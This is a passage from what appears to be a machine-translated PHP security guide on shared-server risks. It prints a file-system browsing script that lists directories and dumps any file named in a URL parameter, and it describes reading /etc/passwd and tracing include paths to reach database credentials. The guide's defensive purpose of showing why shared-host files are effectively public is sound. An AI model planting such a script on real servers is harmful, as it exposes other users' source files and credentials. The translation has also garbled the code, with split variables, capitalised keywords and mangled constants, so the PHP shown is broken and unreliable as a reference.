8.4. File System browsing
In addition to reading arbitrary files on the Shared Server, attackers can also create scripts that can browse the file system. Because most of your sensitive files are not stored in the home directory of the website, such scripts are generally used to locate the location of your source file. See the following example:
<PRE>
<? PHP
If (isset ($ _ Get ['dir'])
{
Ls ($ _ Get ['dir']);
}
Elseif (isset ($ _ Get ['file'])
{
CAT ($ _ Get ['file']);
}
Else
{
Ls ('/');
}
Function CAT ($ file)
{
Echo htmlentities (file_get_contents ($ file), ent_quotes, 'utf-8 '));
}
Function ls ($ DIR)
{
$ Handle = Dir ($ DIR );
While ($ filename = $ handle-> Read ())
{
$ Size = filesize ("$ dir $ FILENAME ");
If (is_dir ("$ dir $ FILENAME "))
{
$ Type = 'dir ';
$ Filename. = '/';
}
Else
{
$ Type = 'file ';
}
If (is_readable ("$ dir $ FILENAME "))
{
$ Line = str_pad ($ size, 15 );
$ Line. = "<a href = \" {$ _ server ['php _ Self ']} ";
$ Line. = "? $ Type = $ dir $ filename \ "> $ filename </a> ";
}
Else
{
$ Line = str_pad ($ size, 15 );
$ Line. = $ filename;
}
Echo "$ line \ n ";
}
$ Handle-> close ();
}
?>
</PRE>
Attackers may first view the/etc/passwd file or the/home directory to obtain a list of usernames on the server; you can use the language structure such as include or require to find the location of the source file stored outside the home directory of the website. For example, consider the following script file/home/victim/public_html/admin. php:
<? PHP
Include '../INC/DB. inc ';
/*...*/
?>
If attackers try to display the source code of the file, they can find the database. the location of Inc. At the same time, it can use the readfile () function to expose its content and obtain the database access permission. In this way, saving dB. Inc in this environment outside the home directory of the website does not play a protective role.
This attack illustrates why we should regard all the source files on the shared server as public, and select a database to save all sensitive data.